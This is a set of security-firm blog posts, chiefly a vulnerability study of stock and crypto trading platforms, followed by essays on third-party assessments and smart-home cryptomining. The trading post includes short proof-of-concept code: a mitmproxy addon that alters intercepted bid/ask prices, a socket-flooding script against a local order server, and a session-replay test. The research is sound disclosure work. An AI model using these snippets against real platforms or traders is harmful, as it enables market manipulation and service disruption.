Are You Trading Stocks Securely? Exposing Security Flaws in Trading Technologies
By
Alejandro Hernandez
This blog post contains a small portion of the entire analysis. Please refer to the white paper for the full details of the research.
Disclaimer
Most of the testing was performed using paper money (demo accounts) provided online by the brokerage houses. Only a few accounts were funded with real money for testing purposes. In the case of commercial platforms, the free trials provided by the brokers were used. Only end-user applications and their direct servers were analyzed. Other backend protocols and related technologies used in exchanges and financial institutions were not tested.
This research is not about High Frequency Trading (HFT), blockchain, or how to get rich overnight.
Introduction
The days of open outcry on trading floors of the NYSE, NASDAQ, and other stock exchanges around the globe are gone. With the advent of electronic trading platforms and networks, the exchange of financial securities now is easier and faster than ever; but this comes with inherent risks.
The valuable information as well as the attack surface and vectors in trading environments are slightly different than those in banking systems.
Brokerage houses offer trading platforms to operate in the market. These applications allow you to do things including, but not limited to:
Fund your account via bank transfers or credit card
Keep track of your available equity and buying power (cash and margin balances)
Monitor your positions (securities you own) and their performance (profit)
Monitor instruments or indexes
Send buy/sell orders
Create alerts or triggers to be executed when certain thresholds are reached
Receive real-time news or video broadcasts
Stay in touch with the trading community through social media and chats
Needless to say, every single item on the previous list must be kept secret and only known by and shown to its owner.
Scope
My analysis started in mid-2017 and concluded in July 2018. It encompassed the following platforms; many of them are among the most used and well-known trading platforms, and some allow cryptocurrency trading:
16 Desktop applications
34 Mobile apps
30 Websites
These platforms are part of the trading solutions provided by the following brokers, which are used by tens of millions of traders. Some brokers offer all three types of platforms; however, in some cases only one or two were reviewed due to certain limitations:
Ally Financial
AvaTrade
Binance
Bitfinex
Bitso
Bittrex
Bloomberg
Capital One
Charles Schwab
Coinbase
easyMarkets
eSignal
ETNA
eToro
E-TRADE
ETX Capital
ExpertOption
Fidelity
Firstrade
FxPro
GBMhomebroker
Grupo BMV
IC Markets
Interactive Brokers
IQ Option
Kraken
Markets.com
Merrill Edge
MetaTrader
NetDania
NinjaTrader
OANDA
Personal Capital
Plus500
Poloniex
Robinhood
Scottrade
TD Ameritrade
TradeStation
Yahoo! Finance
Devices used:
Windows 7 (64-bit)
Windows 10 Home Single (64-bit)
iOS 10.3.3 (iPhone 6) [not jailbroken]
iOS 10.4 (iPhone 6) [not jailbroken]
Android 7.1.1 (Emulator) [rooted]
The security controls and features reviewed are basic and represent just the tip of the iceberg when compared to more exhaustive lists of security checks per platform.
Results
Unfortunately, the results proved to be much worse than those for retail banking applications. For example, mobile apps for trading are less secure than the personal banking apps reviewed in 2013 and 2015.
Apparently, cybersecurity has not been on the radar of the Financial Services Tech space in charge of developing trading apps. Security researchers have disregarded these technologies as well, probably because of a lack of understanding of money markets.
While testing, I noted a basic correlation: the biggest brokers are the ones that invest the most in fintech cybersecurity. Their products are more mature in terms of functionality, usability, and security.
Based on my testing results and opinion, the following trading platforms are the most secure:
TD Ameritrade: Web and mobile
Charles Schwab: Web and mobile
Merrill Edge: Web and mobile
MetaTrader 4/5: Desktop and mobile
Yahoo! Finance: Web and mobile
Robinhood: Web and mobile
Bloomberg: Mobile
TradeStation: Mobile
Capital One: Mobile
FxPro cTrader: Desktop
IC Markets cTrader: Desktop
Ally Financial: Web
Personal Capital: Web
Bitfinex: Web and mobile
Coinbase: Web and mobile
Bitso: Web and mobile
The medium- to high-risk vulnerabilities found across the different platforms include full or partial problems with encryption, denial of service, authentication, and/or session management. Even though these platforms implement good security features, they also have areas that should be addressed to improve their security.
The following are the platforms that, in my opinion, must improve in terms of security:
Interactive Brokers: Desktop, web, and mobile
IQ Option: Desktop, web, and mobile
AvaTrade: Desktop and mobile
E-TRADE: Web and mobile
eSignal: Desktop
TD Ameritrade's Thinkorswim: Desktop
Charles Schwab: Desktop
TradeStation: Desktop
NinjaTrader: Desktop
Fidelity: Web
Firstrade: Web
Plus500: Web
Markets.com: Mobile
Unencrypted Communications
In 9 desktop applications (64%) and 2 mobile apps (6%), unencrypted data transmission was observed. Most applications transmit most of their sensitive data encrypted; however, there were some cases where cleartext data could be seen in unencrypted requests.
Among the data seen unencrypted are passwords, balances, portfolios, personal information, and other trading-related data. In most cases of unencrypted transmission, plaintext HTTP was seen; in others, old proprietary protocols or other financial protocols such as FIX were used.
Under certain circumstances, an attacker with access to some part of the network, such as the router in a public WiFi, could see and modify information transmitted to and from the trading application. In the trading context, a malicious actor could intercept and alter values, such as the bid or ask prices of an instrument, and cause a user to buy or sell securities based on misleading information.
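To make this concrete, below is a hedged sketch of a mitmproxy addon that rewrites a price field in an unencrypted quote response; the "/quotes" endpoint path and the "ask" JSON field are invented for illustration and do not correspond to any specific broker.

```python
# Hypothetical mitmproxy addon (save as tamper_quote.py, run: mitmproxy -s tamper_quote.py).
# The "/quotes" path and the "ask" field are made up for illustration.
import json
from mitmproxy import http

def response(flow: http.HTTPFlow) -> None:
    # Only touch plaintext HTTP traffic to the (hypothetical) quote endpoint.
    if flow.request.scheme != "http" or "/quotes" not in flow.request.path:
        return
    try:
        quote = json.loads(flow.response.get_text())
    except ValueError:
        return
    if isinstance(quote, dict) and isinstance(quote.get("ask"), (int, float)):
        quote["ask"] = round(quote["ask"] * 1.05, 2)   # inflate the ask price by 5%
        flow.response.set_text(json.dumps(quote))
```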
For example, the following application uses unencrypted HTTP. The screenshot shows a buy order:
Another interesting example was found in eSignal's Data Manager. eSignal is a known signal provider and integrates with a wide variety of trading platforms. It acts as a source of market data. During the testing, it was noted that Data Manager authenticates over an unencrypted protocol on TCP port 2189; the protocol appears to have been developed in 1999.
As can be seen, the copyright states it was developed in 1999 by Data Broadcasting Corporation. Doing a quick search, we found a document from the SEC that states the company changed its name to Interactive Data Corporation, the owners of eSignal. In other words, it looks like it is an in-house development created almost 20 years ago. We could not corroborate this information, though.
The main eSignal login screen also authenticates through a cleartext channel:
FIX is a protocol initiated in 1992 and is one of the industry-standard protocols for messaging and trade execution. Currently, it is used by a majority of exchanges and traders. There are guidelines on how to implement it through a secure channel; however, the binary version in cleartext was mostly seen. Tests against the protocol itself were not performed in this analysis.
A broker that supports FIX:
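To illustrate why cleartext FIX traffic is readable to anyone on the network path, here is a minimal parsing sketch; the message itself is fabricated, while the tag numbers used (35, 55, 54, 38, 44) are standard FIX fields.

```python
# Minimal sketch: cleartext FIX is just tag=value pairs separated by the SOH byte.
# The sample order message below is fabricated for illustration.
SOH = "\x01"
sample = SOH.join([
    "8=FIX.4.2", "35=D",        # BeginString, MsgType (D = NewOrderSingle)
    "55=IBM", "54=1",           # Symbol, Side (1 = Buy)
    "38=100", "44=145.30",      # OrderQty, Price
]) + SOH

fields = dict(f.split("=", 1) for f in sample.split(SOH) if f)
print("Symbol:", fields.get("55"), "| Qty:", fields.get("38"), "| Price:", fields.get("44"))
```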
In some cases, the application encrypts the communication channel except for certain features. For instance, the Interactive Brokers desktop and mobile applications encrypt all communication, but not that used by iBot, the robot assistant that receives text or voice commands; iBot sends the instructions to the server embedded in a cleartext FIX protocol message:
News related to the positions was also observed in plaintext:
Another instance of an application that uses encryption except for certain channels is Interactive Brokers for Android, where a diagnostics log with sensitive data is sent to the server on a scheduled basis through unencrypted HTTP:
A similar platform that sends everything over HTTPS is IQ Option, but for some reason, it sends duplicate unencrypted HTTP requests to the server, disclosing the session cookie.
Others, such as Charles Schwab, appear to implement their own binary protocols; however, symbols in watchlists or quoted symbols could be seen in cleartext:
Interactive Brokers supports encryption but uses an insecure channel by default; an inexperienced user who does not know the meaning of "SSL" (Secure Sockets Layer) won't enable it on the login screen, and some sensitive data will be sent and received without encryption:
Passwords Stored Unencrypted
In 7 mobile apps (21%) and in 3 desktop applications (21%), the user’s password was stored unencrypted in a configuration file or sent to log files. Local access to the computer or mobile device is required to extract them, though. This access could be either physical or through malware.
In a hypothetical attack scenario, a malicious user could extract a password from the file system or the logging functionality without any in-depth know-how (it's relatively easy), log in through the web-based trading platform from the brokerage firm, and perform unauthorized actions. They could sell stocks, transfer the money to a newly added bank account, and delete this bank account after the transfer is complete. During testing, I noticed that most web platforms (over 75%) support two-factor authentication (2FA); however, it's not enabled by default: the user must go to the configuration and enable it to receive authorization codes by text message or email. Hence, if 2FA is not enabled on the account, it's possible for an attacker who already knows the password to link a new bank account and withdraw the money from sold securities.
The following are some instances where passwords are stored locally unencrypted or sent to logs in cleartext:
Base64 is not encryption:
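As a minimal illustration (with a made-up stored value), decoding such a "protected" password takes one line:

```python
# Base64 is an encoding, not encryption: anyone who reads the value can decode it.
# The stored value below is made up for illustration.
import base64

stored = "c3VwZXJzZWNyZXQxMjM="           # what the config file actually contains
print(base64.b64decode(stored).decode())  # -> supersecret123
```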
In some cases, the password was sent to the server as a GET parameter, which is also insecure:
One PIN for login and unlocking the app was also seen:
In IQ Option, the password was stored completely unencrypted:
However, in a newer version, the password is encrypted in a configuration file, but is still stored in cleartext in a different file:
Trading and Account Information Stored Unencrypted
In the trading context, operational or strategic data must not be stored unencrypted nor sent to any log file in cleartext. This sensitive data encompasses values such as personal data, general balances, cash balance, margin balance, net worth, net liquidity, the number of positions, recently quoted symbols, watchlists, buy/sell orders, alerts, equity, buying power, and deposits. Additionally, sensitive technical values such as username, password, session ID, URLs, and cryptographic tokens should not be exposed either.
8 desktop applications (57%) and 15 mobile apps (44%) sent sensitive data in cleartext to log files or stored it unencrypted. Local access to the computer or mobile device is required to extract this data, though. This access could be either physical or through malware.
If these values are somehow leaked, a malicious user could gain insight into users’ net worth and investing strategy by knowing which instruments users have been looking for recently, as well as their balances, positions, watchlists, buying power, etc.
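One mitigation, sketched below under the assumption of Python-based backend or tooling code, is a logging filter that masks sensitive fields before anything reaches a log file; the field names are illustrative.

```python
# Hedged sketch: a logging filter that redacts sensitive trading fields.
# The field names in the pattern are illustrative, not any vendor's schema.
import logging
import re

SENSITIVE = re.compile(r'(password|session_id|balance|net_worth|buying_power)=([^&\s]+)', re.I)

class RedactingFilter(logging.Filter):
    def filter(self, record: logging.LogRecord) -> bool:
        # Mask the value of any sensitive key before the record is emitted.
        record.msg = SENSITIVE.sub(r'\1=***', str(record.msg))
        return True

log = logging.getLogger("trading")
log.addHandler(logging.StreamHandler())
log.addFilter(RedactingFilter())
log.warning("login ok: user=jdoe password=hunter2 balance=10500.00")
# -> login ok: user=jdoe password=*** balance=***
```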
The following screenshots show applications that store sensitive data unencrypted:
Balances:
Investment portfolio:
Buy/sell orders:
Watchlists:
Recently quoted symbols:
Other data:
Trading Programming Languages with DLL Import Capabilities
This is not a bug, it’s a feature. Some trading platforms allow their customers to create their own automated trading robots (a.k.a. expert advisors), indicators, and other plugins. This is achieved through their own programming languages, which in turn are based on other languages, such as C++, C#, or Pascal.
The following are a few of the trading platforms with their own trading language:
MetaTrader: MetaQuotes Language (Based on C++ – Supports DLL imports)
NinjaTrader: NinjaScript (Based on C# – Supports DLL imports)
TradeStation: EasyLanguage (Based on Pascal – Supports DLL imports)
AvaTradeAct: ActFX (Based on Pascal – Does not support OS commands nor DLL imports)
(FxPro/IC Markets) cTrader: Based on C# (OS command and DLL support is unknown)
Nevertheless, some platforms such as MetaTrader warn their customers about the dangers related to DLL imports and advise them to only execute plugins from trusted sources. However, there are Internet tutorials claiming their trading robots will "make you rich overnight." These tutorials also give detailed instructions on how to install them in MetaTrader, including enabling the checkbox that allows DLL imports. Innocent, non-tech-savvy traders are likely to enable such controls, since not everyone knows what a DLL file is or what is being imported from it. Dangerous.
The following is a malicious Ichimoku indicator that, when loaded into any chart, downloads and executes a backdoor for remote access:
Another basic example is NinjaTrader, which simply allows OS commands through C#'s System.Diagnostics.Process.Start(). In the following screenshot, calc.exe is executed from the chart initialization routine:
Denial of Service
Many desktop platforms integrate with other trading software through common TCP/IP sockets. Nevertheless, some common weaknesses are present in the connection handling of such services.
A common error is not limiting the number of concurrent connections. If a TCP daemon does not limit concurrent connections, the application is susceptible to denial-of-service (DoS) or other types of attacks, depending on its nature.
For example, TD Ameritrade's Thinkorswim TCP-Orders Server listens on TCP port 2000 on the localhost interface, with no limit on connections and no waiting time between orders. This leads to the following problems:
Memory leakage since, apparently, the resources assigned to every connection are not freed upon termination.
Continuous order pop-ups (one pop-up per order received through the TCP server) render the application useless.
A NULL pointer dereference is triggered and an error report (.zip file) is created.
Although it listens on the local interface only, there are different ways to reach this port, such as XMLHttpRequest() in JavaScript through a web browser.
Memory leakage could be easily triggered by creating as many connections as possible:
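A proof of concept for this class of issue can be as simple as the following hedged sketch, which holds open as many sockets as the server will accept; port 2000 is the Thinkorswim TCP-Orders port mentioned above, and this should only ever be run against your own test instance.

```python
# Hedged proof-of-concept sketch: exhaust a local order server that never
# limits concurrent connections. Run only against your own test instance.
import socket

conns = []
try:
    while True:
        s = socket.create_connection(("127.0.0.1", 2000), timeout=2)
        conns.append(s)            # keep the socket open so its resources are never freed
        if len(conns) % 500 == 0:
            print(f"{len(conns)} connections held open")
except OSError as e:
    print(f"server stopped accepting after {len(conns)} connections: {e}")
```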
A similar DoS vulnerability due to memory exhaustion was found in eSignal’s Data Manager. eSignal is a known signal provider and integrates with a wide variety of trading platforms. It acts as a source of market data; therefore, availability is the most important asset:
It’s recommended to implement a configuration item to allow the user to control the behavior of the TCP order server, such as controlling the maximum number of orders sent per minute as well as the number of seconds to wait between orders to avoid bottlenecks.
The following capture from Interactive Brokers shows when this countermeasure is implemented properly. No more than 51 users can be connected simultaneously:
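For developers, a minimal sketch of this countermeasure might look like the following; the limits are illustrative, not any vendor's defaults.

```python
# Minimal sketch: cap concurrent connections and pace incoming orders.
# MAX_CLIENTS and ORDER_DELAY are illustrative values only.
import asyncio

MAX_CLIENTS = 50
ORDER_DELAY = 1.0                          # seconds to wait between processed orders
clients = asyncio.Semaphore(MAX_CLIENTS)

async def handle(reader, writer):
    if clients.locked():                   # over the limit: refuse immediately
        writer.close()
        return
    async with clients:
        while order := await reader.readline():
            # process_order(order) would go here
            await asyncio.sleep(ORDER_DELAY)   # throttle order intake
    writer.close()

async def main():
    server = await asyncio.start_server(handle, "127.0.0.1", 2000)
    async with server:
        await server.serve_forever()

asyncio.run(main())
```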
Session Still Valid After Logout
Normally, when the logout button is pressed in an app, the session is finished on both sides: server and client. Usually the server deletes the session token from its valid session list and sends a new empty or random value back to the client to clear or overwrite the session token, so the client needs to reauthenticate next time.
In some web platforms such as E-TRADE, Charles Schwab, Fidelity and Yahoo! Finance (Fixed), the session was still valid one hour after clicking the logout button:
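Testing for this issue is straightforward: replay an authenticated request with the old cookie after logging out. The sketch below uses placeholder URLs for a hypothetical broker's web platform.

```python
# Hedged test sketch: does the old session cookie still work after logout?
# All URLs and credentials are placeholders.
import requests

s = requests.Session()
s.post("https://broker.example/login", data={"user": "jdoe", "password": "..."})
cookie_backup = s.cookies.copy()           # keep a copy of the authenticated cookies

s.post("https://broker.example/logout")

replay = requests.get("https://broker.example/account/positions", cookies=cookie_backup)
print("session still valid after logout!" if replay.status_code == 200 else "session invalidated")
```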
Authentication
While most web-based trading platforms support 2FA (over 75%), most desktop applications do not implement it to authenticate their users, even when the web-based platform from the same broker supports it.
Nowadays, most modern smartphones support fingerprint-reading, and most trading apps use it to authenticate their customers. Only 8 apps (24%) do not implement this feature.
Unfortunately, using the fingerprint database in the phone has a downside:
Weak Password Policies
Some institutions let the users choose easily guessable passwords. For example:
The lack of a secure password policy increases the chances that a brute-force attack will succeed in compromising user accounts.
In some cases, such as in IQ Option and Markets.com, the password policy validation is implemented on the client side only; hence, it is possible to intercept a request and send a weak password to the server:
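The fix is to repeat the policy check on the server, in the handler that actually sets the password. A hedged sketch with an example baseline policy (not any specific broker's rules):

```python
# Sketch of a server-side password policy check; the rules are an example
# baseline only. Client-side checks alone can be bypassed with an
# intercepting proxy, so this must also run in the backend handler.
import re

def password_is_acceptable(pw: str) -> bool:
    return (
        len(pw) >= 10
        and bool(re.search(r"[a-z]", pw))
        and bool(re.search(r"[A-Z]", pw))
        and bool(re.search(r"\d", pw))
        and bool(re.search(r"[^A-Za-z0-9]", pw))
    )

print(password_is_acceptable("1234"))           # False
print(password_is_acceptable("Tr4d3r!Secure"))  # True
```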
Automatic Logout/Lockout for Idle Sessions
Most web-based platforms log out or lock out the user automatically, but this is not the case for many desktop applications (43%) and mobile apps (25%). This is a security control that forces the user to authenticate again after a period of idle time.
Privacy Mode
This mode protects the customers’ private information from being displayed on the screen in public areas where shoulder-surfing attacks are feasible. Most of the mobile apps, desktop applications, and web platforms do not implement this useful and important feature.
The following images show before and after enabling privacy mode in Thinkorswim for mobile:
Hardcoded Secrets in Code and App Obfuscation
16 Android .apk installers (47%) were easily reverse engineered to human-readable code since they lack obfuscation. Most Java and .NET-based desktop applications were also reverse engineered easily. The rest of the applications had medium to high levels of obfuscation, such as Merrill Edge in the next screenshot.
The goal of obfuscation is to conceal the application's purpose and logic (security through obscurity) in order to deter reverse engineering and make it more difficult.
In the non-obfuscated platforms, there are hardcoded secrets such as cryptographic keys and third-party service partner passwords. This information could allow unauthorized access to other systems that are not under the control of the brokerage houses. For example, a Morningstar.com account (investment research) hardcoded in a Java class:
Interestingly, 14 of the mobile apps (41%) and 4 of the desktop platforms (29%) have traces (hostnames and IPs) of the internal development and testing environments where they were built or tested. Some hostnames are reachable from the Internet, and since they are testing systems, they could lack proper protections.
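Finding this kind of material does not require sophisticated tooling; a hedged sketch that greps decompiled sources (for example, jadx output) for credential-looking strings and internal hostnames follows. The patterns are only illustrative starting points.

```python
# Hedged sketch: scan decompiled sources for hardcoded secrets and internal hosts.
# The directory name and regex patterns are illustrative only.
import pathlib
import re

PATTERNS = {
    "credential": re.compile(r'(password|passwd|api[_-]?key|secret)\s*[:=]\s*["\'][^"\']+["\']', re.I),
    "internal host": re.compile(r'\b[\w.-]+\.(corp|internal|local|dev|qa)\b', re.I),
    "private IP": re.compile(r'\b(10\.\d{1,3}|192\.168|172\.(1[6-9]|2\d|3[01]))\.\d{1,3}\.\d{1,3}\b'),
}

for path in pathlib.Path("decompiled_app").rglob("*.java"):
    text = path.read_text(errors="ignore")
    for label, pattern in PATTERNS.items():
        for match in pattern.finditer(text):
            print(f"{path}: possible {label}: {match.group(0)[:80]}")
```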
SSL Certificate Validation
11 of the reviewed mobile apps (32%) do not check the authenticity of the remote endpoint by verifying its SSL certificate; therefore, it's feasible to perform Man-in-the-Middle (MiTM) attacks to eavesdrop on and tamper with data. Some MiTM attacks require tricking the user into installing a malicious certificate on their phone, though.
The apps that do verify the certificate normally do not transmit any data; however, only Charles Schwab allows the user to use the app with the provided certificate:
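For reference, certificate pinning can be as simple as comparing the server certificate's SHA-256 fingerprint against a value shipped with the application; the hostname and pinned digest in this sketch are placeholders.

```python
# Hedged sketch of certificate pinning by fingerprint comparison.
# PINNED_SHA256 and the hostname are placeholders.
import hashlib
import ssl

PINNED_SHA256 = "0123abcd..."          # fingerprint known at build time (placeholder)

def fingerprint_matches(host: str, port: int = 443) -> bool:
    pem = ssl.get_server_certificate((host, port))
    der = ssl.PEM_cert_to_DER_cert(pem)
    return hashlib.sha256(der).hexdigest() == PINNED_SHA256

if not fingerprint_matches("trading.example.com"):
    raise SystemExit("certificate mismatch: refusing to send credentials")
```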
Lack of Anti-exploitation Mitigations
ASLR randomizes the virtual address space locations of dynamically loaded libraries. DEP disallows the execution of data in the data segment. Stack canaries are used to identify whether the stack has been corrupted. These security features make it much more difficult to exploit memory corruption bugs and execute arbitrary code.
The majority of the desktop applications do not have these security features enabled in their final releases. In some cases, these features are only enabled in some components, not the entire application. In other cases, components that handle network connections also lack these flags.
Linux applications have similar protections. IQ Option for Linux does not enforce all of them on certain binaries.
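Checking whether a Windows binary opts in to ASLR and DEP only requires reading its PE header; the sketch below uses the third-party pefile package.

```python
# Hedged sketch: check a Windows binary's PE header for ASLR and DEP opt-in flags.
import sys
import pefile

DYNAMIC_BASE = 0x0040   # IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE -> ASLR
NX_COMPAT    = 0x0100   # IMAGE_DLLCHARACTERISTICS_NX_COMPAT    -> DEP

pe = pefile.PE(sys.argv[1])
flags = pe.OPTIONAL_HEADER.DllCharacteristics
print("ASLR:", "enabled" if flags & DYNAMIC_BASE else "MISSING")
print("DEP: ", "enabled" if flags & NX_COMPAT else "MISSING")
# Stack canaries (/GS) leave no header flag; they are usually confirmed by
# looking for the __security_cookie check in a disassembler.
```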
Other Weaknesses
More issues were found in the platforms. For more details, please refer to the white paper.
Statistics
Since a picture is worth a thousand words, consider the following graphs:
For more statistics, please refer to the white paper.
Responsible Disclosure
One of IOActive’s missions is to act responsibly when it comes to vulnerability disclosure. In September 2017, we sent a detailed report to 13 of the brokerage firms whose mobile trading apps presented some of the higher-risk vulnerabilities discussed in this paper. More recently, between May and July 2018, we sent additional vulnerability reports to brokerage firms.
As of July 27, 2018, 19 brokers that have medium- or high-risk vulnerabilities in any of their platforms were contacted.
TD Ameritrade and Charles Schwab were the brokers that communicated the most with IOActive to resolve the reported issues.
For a table with the current status of the responsible disclosure process, please refer to the white paper.
Conclusions and Recommendations
Trading platforms are less secure than the applications seen in retail banking.
There’s still a long way to go to improve the maturity level of security in trading technologies.
End users should enable all the security mechanisms their platforms offer, such as 2FA and/or biometric authentication and automatic lockout/logout. Also, it’s recommended not to trade while connected to public networks and not to use the same password for other financial services.
Brokerage firms should perform regular internal audits to continuously improve the security of their trading platforms.
Brokerage firms should also offer security guidance in their online education centers.
Developers should analyze their current applications to determine if they suffer from the vulnerabilities described in this paper, and if so, fix them.
Developers should design new, more secure financial software following secure coding practices.
Regulators should encourage brokers to implement safeguards for a better trading environment. They could also create trading-specific guidelines to be followed by the brokerage firms and FinTech companies in charge of creating trading software.
Rating organizations should include security in their reviews.
Side Note
Remember: the stock market is not a casino where you magically get rich overnight. If you lack an understanding of how stocks or other financial instruments work, there is a high risk of losing money quickly. You must understand the market and its purpose before investing.
With nothing left to say, I wish you happy and secure trading!
Security Theater and the Watch Effect in Third-party Assessments
By
Daniel Miessler
Before the facts were in, nearly every journalist and salesperson in infosec was thinking about how to squeeze lemonade from the Equifax breach. Let’s be honest – it was and is a big breach. There are lessons to be learned, but people seemed to have the answers before the facts were available.
It takes time to dissect these situations and early speculation is often wrong. Efforts at attribution and methods take months to understand. So, it’s important to not buy into the hysteria and, instead, seek to gain a clear vision of the actual lessons to be learned. Time and again, these supposed “watershed moments” and “wake-up calls” generate a lot of buzz, but often little long-term effective action to improve operational resilience against cyber threats.
At IOActive we guard against making on-the-spot assumptions. We consider and analyze the actual threats, ever mindful of the “Watch Effect.” The Watch Effect can be simply explained: wear a watch long enough and you stop feeling it.
I won’t go into what third-party assessments Equifax may or may not have had because that’s largely speculation. The company has probably been assessed many times, by many groups with extensive experience in the prevention of cyber threats and the implementation of active defense. And they still experienced a deep impact cyber incursion.
The industry-wide point here is: Everyone is asking everyone else for proof that they’re secure.
The assumption and Watch Effect come in at the point where company executives think their responses to high-level security questions actually mean something.
Well, sure, they do mean something. In the case of questionnaires, you are asking a company to perform a massive amount of tedious work, and if they return the questionnaire filled in, without gross errors and without saying “no” where they should have said “yes,” that probably counts for something.
But the question is how much do we really know about a company’s security by looking at their responses to a security questionnaire?
The answer is, “not much.”
As a company that has been security testing for 20 years now, IOActive has successfully breached even the most advanced cyber defenses across countless companies during penetration tests that were certified backwards and forwards by every group you can imagine. So, the question to ask is, “Do questionnaires help at all? And if so, how much?”
Here’s a way to think about that.
At IOActive we conduct full, top-down security reviews of companies that include business risk, crown-jewel defense, and every layer that these pieces touch. Because we know how attackers get in, we measure and test how effective the company is at detecting and responding to cyber events – and use this comprehensive approach to help companies understand how to improve their ability to prevent, detect, and ever so critically, RESPOND to intrusions. Part of that approach includes a series of interviews with everyone from the C-suite to the people watching logs. What we find is frightening.
We are often days or weeks into an assessment before we discover a thread to pull that uncovers a major risk, whether that thread comes from a technical assessment or a person-to-person interview or both.
That’s days—or weeks—of being onsite with full access to the company as an insider.
Here’s where the Watch Effect comes in. Many of the companies have no idea what we’re uncovering or how bad it is because of the Watch Effect. They’re giving us mostly standard answers about their day-to-day, the controls they have in place, etc. It’s not until we pull the thread and start probing technically – as an attacker – that they realize they’re wearing a broken watch.
Then they look down at a set of catastrophic vulnerabilities on their wrist and say, “Oh. That’s a problem.”
So, back to the questionnaire…
If it takes days or weeks for an elite security firm to uncover these vulnerabilities onsite with full cooperation during an INTERNAL assessment, how do you expect to uncover those issues with a form?
You can’t. And you should stop pretending you can. Questionnaires depend far too much upon the capability and knowledge of the person or team filling them out, and they are often completed with only partial knowledge. How would one know if a firewall rule were improperly updated to “any/any” in the last week if it is not tested and verified?
To be clear, the problem isn’t that third-party assessments only give 2/10 in security assessment value. The problem is that executives THINK they’re getting 6/10, or 9/10.
It’s that disconnect that’s causing the harm.
Eventually, companies will figure this out. In the meantime, the breaches won’t stop.
Until then, we as technical practitioners can do our best to convince our clients and prospects to understand the value these types of cursory, external glances at a company provide. Very little. So, let’s prioritize appropriately.
There are many tiny elements to cryptocurrency that are not getting the awareness time they deserve. To start, the very thing that attracts people to cryptocurrency is also the very thing that is seemingly overlooked as a challenge. Cryptocurrencies are not backed by governments or institutions. The transactions allow the trader or investor to operate with anonymity. In the last year, we have seen a massive increase in cyber bad guys hiding behind these inconspicuous transactions – ransomware demanding payment in bitcoin; bitcoin ATMs being used by various dealers to effectively clean money.
Because there are few regulations governing crypto trading, we cannot see if cryptocurrency is being used to fund criminal or terrorist activity. There is an ancient funds transfer capability, designed to avoid banks and ledgers called Hawala. Hawala is believed to be the method by which terrorists are able to move money, anonymously, across borders with no governmental controls. Sound like what’s happening with cryptocurrency? There’s an old saying in law enforcement – follow the money. Good luck with that one.
Many people don’t realize that cryptocurrencies depend on multiple miners. This allows the processing to be spread out and decentralized. Miners validate the integrity of the transactions and as a result, the miners receive a “block reward” for their efforts. But, these rewards are cut in half every 210,000 blocks. A bitcoin block reward when it first started in 2009 was 50 BTC, today it’s 12.5. There are about 1.5 million bitcoins left to mine before the reward halves again.
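The halving schedule described above is simple arithmetic, as the following sketch shows:

```python
# The block subsidy starts at 50 BTC and is halved every 210,000 blocks.
def block_reward(height: int) -> float:
    return 50 / (2 ** (height // 210_000))

print(block_reward(0))        # 50.0  (2009, genesis era)
print(block_reward(500_000))  # 12.5  (the current era described above)
# Summing 210_000 * 50 * (1 + 1/2 + 1/4 + ...) gives the ~21 million BTC cap.
```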
This limit on total bitcoins leads to an interesting issue – as the reward decreases, miners will switch their attention from bitcoin to other cryptocurrencies. This will reduce the number of miners, therefore making the network more centralized. This centralization creates greater opportunity for cyber bad guys to “hack” the network and wreak havoc, or for the remaining miners to monopolize the mining.
At some point, and we are already seeing the early stages of this, governments and banks will demand to implement more control. They will start to produce their own cryptocurrency. Would you trust these cryptos? What if your bank offered loans in Bitcoin, Ripple or Monero? Would you accept and use this type of loan?
Because it’s a limited resource, what happens when we reach the 21 million bitcoin limit? Unless we change the protocols, this event is estimated to happen by 2140. My first response – I don’t think bitcoins will be at the top of my concerns list in 2140.
The Interconnected Home
So what does crypto-mining malware or mineware have to do with your home? It’s easy enough to notice if your laptop is being overused – the device slows down, the battery runs down quickly. How can you tell if your fridge or toaster is compromised? With your smart home now interconnected, what happens if the cyber bad guys operate there? All a cyber bad guy needs is electricity, internet, and CPU time. Soon your fridge will charge your toaster a bitcoin for bread and butter. How do we protect our unmonitored devices from this mineware? Who is responsible for ensuring the right level of security on your home devices to prevent this?
Smart home vulnerabilities present a real and present danger. We have already seen baby monitors, robots, and home security products, to name a few, all compromised. Most by IOActive researchers. There can be many risks that these compromises introduce to the home, not just around cryptocurrency. Think about how the interconnected home operates. Any device that’s SMART now has the three key ingredients to provide the cyber bad guy with everything he needs – internet access, power and processing.
Firstly, I can introduce my mineware via a compromised mobile phone and start to exploit the processing power of your home devices to mine bitcoin. How would you detect this? When could you detect this? At the end of the month, when you get an electricity bill. Instead of 50 pounds a month, it’s now 150 pounds. But how do you diagnose the issue? You complain to the power company. They show you the usage. It’s correct. Your home IS consuming that power.
They say that crypto mining is now using as much power as a small country. That’s got a serious impact on the power infrastructure as well as the environment. Ahhhh you say, I have a smart meter, it can give me a real time read out of my usage. Yes, it’s a computer. And, if I’m a cyber bad guy, I can make that computer tell me the latest football scores if I want. The key for a corporation when a cyber bad guy is attacking is to reduce dwell time. Detect and stop the bad guy from playing in your network. There are enterprise tools that can perform these tasks, but do you have these same tools at home? How would you Detect and React to a cyber bad guy attacking your smart home?
IOActive has proven these attack vectors over and over. We know this is possible, and we know it is almost impossible to detect. Remember, a cyber bad guy makes several assessments when deciding on an attack – the risk of detection, the reward for the effort, and the penalty for capture. The risk of detection is low, like very low. The reward, well, you could be mining blocks for months without stopping; that’s tens of thousands of dollars. And the penalty… what’s the penalty for someone hacking your toaster… The impact is measurable to the homeowner. This is real, and who’s to say it’s not happening already. Ask your fridge!!
What’s the Answer – Avoid Using Smart Home Devices Altogether?
No, we don’t believe the best defense is to avoid adopting this new technology. The smart and interconnected home can offer its users fantastic opportunities. We believe that the responsibility rests with the manufacturer to ensure that devices are designed and built in a safe and secure way. And, yes, everything is designed; few things are designed well. IOActive researchers spend 99% of their time trying to identify vulnerabilities in these devices for the safety of everyone, not just corporations. The power is in the hands of the consumer. As soon as the consumer starts to purchase products based not only on their power efficiency, but on their security rating as well, then we will see a shift into a more secure home.
In the meantime, consider the entry point for most cyber bad guys. Generally, this is your desktop, laptop or mobile device. Therefore, ensure you have suitable security products running on these devices, make sure they are patched to the correct levels, be conscious of the websites you are visiting. If you control the available entry points, you will go a long way to protecting your home.
Two years ago, we assessed 20 mobile applications that worked with ICS software and hardware. At that time, mobile technologies were widespread, but Internet of Things (IoT) mania was only starting. Our research concluded the combination of SCADA systems and mobile applications had the potential to be a very dangerous and vulnerable cocktail. In the introduction of our paper, we stated “convenience often wins over security. Nowadays, you can monitor (or even control!) your ICS from a brand-new Android [device].”
